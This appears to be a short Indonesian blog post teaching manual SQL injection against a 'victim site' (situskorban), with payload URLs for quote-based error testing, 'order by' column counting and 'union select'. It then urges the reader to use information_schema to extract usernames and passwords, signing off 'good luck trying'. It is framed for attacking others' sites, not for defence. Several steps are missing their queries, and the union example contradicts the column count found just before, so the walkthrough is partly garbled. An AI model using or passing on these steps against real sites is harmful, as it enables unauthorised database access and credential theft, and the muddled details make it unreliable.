Pada kenyataannya, SQL Injection terbukti merupakan salah satu teknik terbaik yang sering melumpuhkan sasarannya.
Langsung saja Ke intinya:
Untuk mengetahui apakah suatu aplikasi web di serang oleh sql injection atau tidak,kita coba dengan menambahkan single quotes (‘) pada URL,contoh:
www.situskorban.com/news.php?id=1’
dan jika situs tersebut bisa diinjeksi maka akan keluar pesan error
dan langsung saja anda cari berapa jumlah table databasenya,gunakan syntak order By dan jangan lupa dengan akhiran /*,#,%00,atau –
sebagai contoh :
http://www.situskorban.com/news.php?id=1+order+by+1-
Tidak ada error
http://www.situskorban.com/news.php?id=1+order+by+2-
tidak ada error
http://www.situskorban.com/news.php?id=1+order+by+3-
tidak ada error
http://www.situskorban.com/news.php?id=1+order+by+4-
ada error yang muncul (Misalnya) dan jika belum da error yang muncul hingga angka berikutnya,
Tes diatas memperlihatkan bahwa table database dari situs korban adalah 3 karena ketika anda memasukan angka 4 terjadi error.
Selanjutnya gunakan Union Function untuk mencari angka mana yang bisa kita injection lebih lanjut
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11-
lalu anda cari Informasi lebih lanjuttentang database korban,misalnya untuk mencari versi database yang di gunakan anda gunakan
untuk mengetahui nama database
untuk mengetahui Username dari data korban
untuk mengetahui isi database
atau dengan menggunakan information_schema,
selanjutnya tinggal anda melanjutkan membuka table –table databasenya dengan menggunakan nama table dan dapatkan username dan passwordnya
Selamat Mencoba..........
Mohon Commentnya !
No comments:
Post a Comment